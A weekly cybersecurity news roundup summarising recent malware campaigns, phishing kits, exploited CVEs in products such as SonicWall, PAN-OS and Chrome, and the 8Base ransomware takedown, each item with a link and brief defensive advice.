Welcome to this week’s Cybersecurity Newsletter, where we bring you the latest updates and key insights from the ever-changing world of cybersecurity.
In today’s fast-paced digital environment, staying informed is crucial. Our goal is to provide you with relevant information to help you navigate the challenges of this dynamic field effectively.
This edition highlights emerging threats and the shifting dynamics of digital defenses. Key topics include advanced ransomware attacks and the increasing influence of state-sponsored cyber activities on global security.
We offer an in-depth analysis of these evolving threats, along with actionable strategies to bolster your organization’s defenses. Additionally, we examine how cutting-edge technologies like artificial intelligence (AI), machine learning (ML), and quantum computing are reshaping cybersecurity—both as tools for protection and as potential vulnerabilities exploited by adversaries.
Examples covered include AI-powered phishing schemes, ML-enhanced malware, and quantum computing’s potential to break encryption. We also explore how industries are addressing critical cybersecurity challenges, such as securing remote work environments and mitigating vulnerabilities in Internet of Things (IoT) devices.
These issues underscore the importance of proactive measures to protect digital infrastructure. We’ll also review recent regulatory developments, such as the European Union’s General Data Protection Regulation (GDPR) and California’s Consumer Privacy Act (CCPA), which are setting new benchmarks for data privacy and security to ensure your compliance strategies remain up-to-date.
Stay tuned each week as we dive into these complex topics and beyond, equipping you with the knowledge needed to stay ahead in the ever-evolving cybersecurity landscape.
Threats
1. Malware Exploits Application Layer for Stealthy Attacks
Analysis of over 1 million malware samples reveals that attackers are increasingly leveraging the Application Layer of the OSI model to conduct stealthy Command-and-Control (C2) operations. By abusing trusted protocols like HTTP/S, DNS, and SMTP, adversaries embed malicious activities within legitimate traffic, evading traditional detection mechanisms. Advanced tools like deep packet inspection and behavioral monitoring are critical to counter these threats.
Read more: https://cybersecuritynews.com/malware-samples-analysis-application-layer/
2. Rise in LLMjacking: DeepSeek-V3 Targeted
The release of DeepSeek-V3 has led to a surge in LLMjacking attacks, where stolen API keys are used to exploit large language models (LLMs). Cybercriminals monetize unauthorized access via reverse proxy systems, generating significant financial losses for victims. Organizations are advised to secure API keys and monitor account activity to mitigate these risks.
Read more: https://cybersecuritynews.com/llm-hijackers-deepseek-v3-model/
3. NetSupport RAT Abused for Full System Control
The NetSupport Remote Access Trojan (RAT) is being weaponized through the “ClickFix” technique, tricking users into executing malicious PowerShell commands. This allows attackers to gain full control over systems, leading to ransomware attacks and data breaches. Organizations should deploy endpoint detection tools and restrict unauthorized software installations.
Read more: https://cybersecuritynews.com/netsupport-rat-grant-attackers-full-access/
4. Valentine’s Day-Themed Domains Used for Cyberattacks
Threat actors are exploiting newly registered Valentine’s Day-themed domains to launch phishing and malware campaigns. A 39% rise in such domains has been observed, with one in eight being malicious or suspicious. Users should verify domain legitimacy and avoid clicking on unsolicited links during seasonal events.
Read more: https://cybersecuritynews.com/hackers-newly-registering-valentines-day-themed-domains/
5. Remote Desktop Manager Vulnerabilities Expose Encrypted Communications
Critical vulnerabilities in Devolutions’ Remote Desktop Manager (RDM) allow attackers to intercept encrypted communications through man-in-the-middle (MITM) attacks. Users are urged to upgrade to patched versions immediately to mitigate these risks.
Read more: https://cybersecuritynews.com/rdm-vulnerabilities-intercept-encrypted-communications/
6. Phishing Campaign Exploits Webflow CDN and Fake CAPTCHAs
A sophisticated phishing campaign abuses Webflow’s CDN and fake CAPTCHA pages to steal sensitive financial information. Victims are lured via search engine results into providing personal details under the guise of subscription services. Caution is advised when interacting with unfamiliar websites or documents found online.
Read more: https://cybersecuritynews.com/new-phishing-attacks-abuses-webflow-cdn-captchas/
7. Winnti Hackers Target Japanese Organizations
The China-based Winnti Group has launched a campaign called “RevivalStone,” targeting Japanese organizations in the manufacturing and energy sectors with advanced malware and WebShells. The attack highlights the need for robust cybersecurity defenses against state-sponsored threats.
Read more: https://cybersecuritynews.com/winnti-hackers-attacking-japanese-organizations/
8. Device Code Phishing Captures Authentication Tokens
Storm-2372 attackers exploit device code authentication to steal tokens, granting unauthorized access to accounts without passwords. Organizations should enforce multi-factor authentication (MFA) and educate users on phishing tactics to defend against such attacks.
Read more: https://cybersecuritynews.com/new-device-code-phishing-attack-exploit-device-code-authentication/
9. Astaroth 2FA Phishing Kit Bypasses Security Measures
The Astaroth phishing kit targets Gmail, Yahoo, and Office 365 users by intercepting two-factor authentication (2FA) codes through fake login pages. Enhanced user vigilance and reliance on app-based MFA instead of SMS are recommended for protection against such threats.
Read more: https://cybersecuritynews.com/new-astaroth-2fa-phishing-kit-targeting-gmail/
10. Fake BSOD Delivered via Malicious Python Script
A Python script using the tkinter library creates a fake “Blue Screen of Death” (BSOD) as an anti-analysis tactic, disrupting systems temporarily while evading antivirus detection due to its low-profile nature. Behavioral analysis is crucial for identifying such threats early on.
Read more: https://cybersecuritynews.com/fake-bsod-delivered/
Cyber Attack News
1. Critical KerioControl Firewall Vulnerability Exposes Thousands of Systems
A severe vulnerability (CVE-2024-52875) in GFI KerioControl firewalls allows remote code execution (RCE) through unauthenticated URI paths. Over 12,000 systems remain unpatched globally, posing risks of data breaches and ransomware attacks. Organizations are urged to restrict access, monitor for unusual activity, and apply updates promptly.
Read more: https://cybersecuritynews.com/keriocontrol-firewall-1-click-rce/
2. SonicWall Firewalls Exploited to Hijack SSL VPN Sessions
Attackers are exploiting a critical flaw (CVE-2024-53704) in SonicWall firewalls to bypass authentication and hijack SSL VPN sessions. The vulnerability stems from improper handling of Base64-encoded session cookies. SonicWall has released patches, and organizations are advised to update immediately to mitigate risks.
Read more: https://cybersecuritynews.com/unpatched-sonicwall-firewalls-vulnerability/
3. Hackers Use Social Engineering to Exploit PowerShell
North Korean hacking group Emerald Sleet is tricking victims into running PowerShell commands as administrators via spear-phishing emails. The attack installs malicious tools for espionage and data theft. Microsoft advises training users to recognize phishing attempts and deploying advanced anti-phishing solutions.
Read more: https://cybersecuritynews.com/hackers-trick-you-to-run-powershell-as-admin/
4. $8.5M Stolen in zkLend DeFi Hack
The Ethereum-based DeFi protocol zkLend suffered a major breach, losing 3,300 ETH ($8.5 million). The company has offered a 10% whitehat bounty for the return of funds but may escalate the matter with law enforcement if the attacker does not respond. Users are reminded of the risks associated with DeFi platforms.
Read more: https://cybersecuritynews.com/zklend-hacked/
5. Apple Silicon’s KASLR Security Bypassed by SysBumps Attack
Researchers have bypassed Apple Silicon’s Kernel Address Space Layout Randomization (KASLR), exposing macOS systems to kernel memory exploitation. The attack leverages speculative execution vulnerabilities in Apple’s M-series processors, highlighting weaknesses in advanced kernel isolation techniques. Apple is investigating mitigation strategies.
Read more: https://cybersecuritynews.com/kaslr-exploited-apple-silicon/
6. Pyramid Pentesting Tool Abused for Stealthy C2 Communications
Hackers are using the open-source Pyramid pentesting tool to establish stealthy command-and-control (C2) channels, bypassing endpoint detection systems. Pyramid’s lightweight HTTP/S server capabilities make it a favored choice for malicious actors seeking to evade detection during post-exploitation activities.
Read more: https://cybersecuritynews.com/hackers-using-pyramid-pentesting-tool/
7. Malware Exploits Microsoft Outlook via Graph API
A sophisticated malware campaign uses Microsoft Outlook as a communication channel through the Graph API, employing custom tools like PATHLOADER and FINALDRAFT for espionage and data exfiltration. Organizations should monitor Graph API usage and implement stringent access controls to counter such threats effectively.
Read more: https://cybersecuritynews.com/new-malware-exploiting-outlook-as-a-communication-channel/
8. PAN-OS Authentication Bypass Actively Exploited
Palo Alto Networks has patched a high-severity authentication bypass vulnerability (CVE-2025-0108) in PAN-OS software that attackers are actively exploiting. Organizations must update affected versions immediately and restrict management interface access to trusted IPs to reduce exposure risks.
Read more: https://cybersecuritynews.com/pan-os-authentication-bypass-exploited/
9. Salt Typhoon Hackers Exploit Cisco Devices Globally
The Chinese state-sponsored group Salt Typhoon exploited over 1,000 unpatched Cisco devices using privilege escalation vulnerabilities (CVE-2023-20198 and CVE-2023-20273). These attacks target telecommunications providers and universities, emphasizing the need for immediate patching and enhanced network security measures.
Read more: https://cybersecuritynews.com/salt-typhoon-hackers-exploited-1000-cisco-devices/
Vulnerability News
1. Microsoft SharePoint Connector Vulnerability (CVE-2024-49070)
A critical SSRF vulnerability in Microsoft Power Platform’s SharePoint connector allowed attackers to impersonate users and access sensitive data. Exploitation required specific user roles, but Microsoft has patched the flaw. Organizations are advised to apply updates and monitor for suspicious activity.
Read more: https://cybersecuritynews.com/microsoft-sharepoint-connector-vulnerability/
2. Apple Zero-Day Vulnerability (CVE-2025-24200)
Apple released iOS and iPadOS 18.3.1 to address a zero-day vulnerability targeting USB Restricted Mode. This flaw allowed physical attackers to disable the feature on locked devices, posing risks to targeted individuals. Immediate updates are recommended for all eligible devices.
Read more: https://cybersecuritynews.com/apple-0-day-vulnerability-exploited-in-extremely-sophisticated-attacks-in-the-wild/
3. Progress LoadMaster Security Vulnerabilities
Multiple critical vulnerabilities in Progress LoadMaster products could allow attackers to execute arbitrary commands or access sensitive files. No reports of exploitation have surfaced, but users should update to the latest firmware immediately.
Read more: https://cybersecuritynews.com/progress-loadmaster-security-vulnerability/
4. SAP Patches 19 Vulnerabilities
SAP released updates addressing high-severity vulnerabilities, including XSS, authentication bypasses, and authorization flaws across platforms like NetWeaver and BusinessObjects. Timely patching is crucial to mitigate exploitation risks.
Read more: https://cybersecuritynews.com/19-vulnerabilities-across-multiple-products-patched/
5. Ivanti CSA RCE Vulnerability (CVE-2024-47908)
Ivanti patched a critical command injection vulnerability in its Cloud Services Appliance (CSA), which could allow remote code execution by authenticated attackers. Users are urged to upgrade to version 5.0.5 immediately.
Read more: https://cybersecuritynews.com/ivanti-csa-vulnerability-rce/
6. Fortinet FortiOS DoS and RCE Flaws
Fortinet addressed vulnerabilities in its VPN software that could lead to denial-of-service attacks or remote code execution due to outdated library usage. Updated FortiOS versions are now available, and immediate patching is advised.
Read more: https://cybersecuritynews.com/fortios-vulnerabilities-allowing-dos-rce/
7. OpenSSL MitM Vulnerability (CVE-2024-12797)
A high-severity flaw in OpenSSL versions 3.2–3.4 could enable man-in-the-middle attacks during TLS handshakes using raw public keys (RPKs). Administrators must update OpenSSL to the latest patched versions promptly.
Read more: https://cybersecuritynews.com/openssl-vulnerability/
8. AWS IAM Username Enumeration Flaws
Two vulnerabilities in AWS IAM login flows allowed attackers to enumerate valid usernames via MFA prompts and timing discrepancies. AWS has patched one issue, while the other remains an accepted risk; organizations should enable MFA and monitor login events closely.
Read more: https://cybersecuritynews.com/aws-iam-vulnerabilities/
9. PAN-OS Authentication Bypass (CVE-2025-0108)
Palo Alto Networks disclosed a vulnerability in PAN-OS that allowed unauthenticated attackers to bypass web interface authentication under specific configurations. Organizations should upgrade affected systems and restrict interface access to internal IPs only.
Read more: https://cybersecuritynews.com/pan-os-vulnerability-web-interface-authentication/
10. Chrome Use-After-Free Vulnerability (CVE-2025-0995)
Google released an urgent Chrome update addressing critical vulnerabilities, including a use-after-free flaw in the V8 JavaScript engine that could enable remote code execution via crafted HTML pages. Users should update Chrome immediately to secure their browsers against potential exploits.
Read more: https://cybersecuritynews.com/chrome-use-after-free-vulnerability-v8/
11. Firewall Authentication Bypass Issue
A newly discovered firewall vulnerability allows attackers to bypass authentication mechanisms under certain conditions, compromising network security systems’ integrity and confidentiality. Immediate updates are recommended for affected devices.
Read more: https://cybersecuritynews.com/firewall-authentication-bypass-vulnerability/
Other Cyber News
1. GitHub Copilot Introduces Agent Mode for Autonomous Coding
GitHub has launched a revolutionary update to its AI-powered coding assistant, GitHub Copilot, with the introduction of Agent Mode. This new feature enables developers to autonomously complete complex coding tasks, such as debugging, designing database schemas, and implementing APIs. Available in preview for Visual Studio Code Insiders, Agent Mode combines advanced AI capabilities with workflow automation.
Additionally, GitHub announced the general availability of Copilot Edits, which allows multi-file changes using natural language prompts. A sneak peek into Project Padawan also revealed plans for autonomous software engineering agents capable of automating tasks like generating pull requests and refactoring codebases.
Read more: GitHub Copilot’s New Agent Mode
2. Major Takedown of 8Base Ransomware Group
In a significant breakthrough, Thai authorities have arrested four European nationals linked to the notorious 8Base ransomware group. The operation, codenamed “Phobos Aetor,” led to the seizure of the group’s dark web infrastructure. The suspects are accused of deploying Phobos ransomware, targeting over 1,000 victims globally and causing damages exceeding $16 million.
The group used a “double extortion” strategy, encrypting data while threatening to leak it if ransoms were not paid. This takedown highlights growing international cooperation in combating ransomware threats.
Read more: 8Base Ransomware Dark Web Site Seized
3. Google Chrome’s Enhanced Safe Browsing Protects Over 1 Billion Users
Google Chrome’s Enhanced Protection mode now safeguards more than 1 billion users against phishing and scams. This advanced security feature offers twice the protection compared to standard modes by leveraging AI and machine learning to detect malicious websites and downloads in real time.
Enhanced Protection also conducts over 300,000 deep scans monthly to identify malware hidden in suspicious files, ensuring robust online safety while prioritizing user privacy.
Read more: Google Chrome’s Safe Browsing
4. Windows 11 Compression Formats Pose Security Risks
Microsoft’s latest Windows 11 update (KB5031455) added native support for 11 new compression formats like RAR and 7z via the open-source libarchive library. However, this integration has exposed users to vulnerabilities, including remote code execution (RCE) flaws (CVE-2024-20696 and CVE-2024-20697).
These vulnerabilities stem from improper bounds checking during file decompression, allowing attackers to execute arbitrary code or manipulate files on affected systems. Users are advised to exercise caution when handling archives from untrusted sources.
Read more: Windows 11’s New Compression Formats Pose Risks
The post Cybersecurity Weekly Recap: Latest on Attacks, Vulnerabilities, & Data Breaches appeared first on Cyber Security News.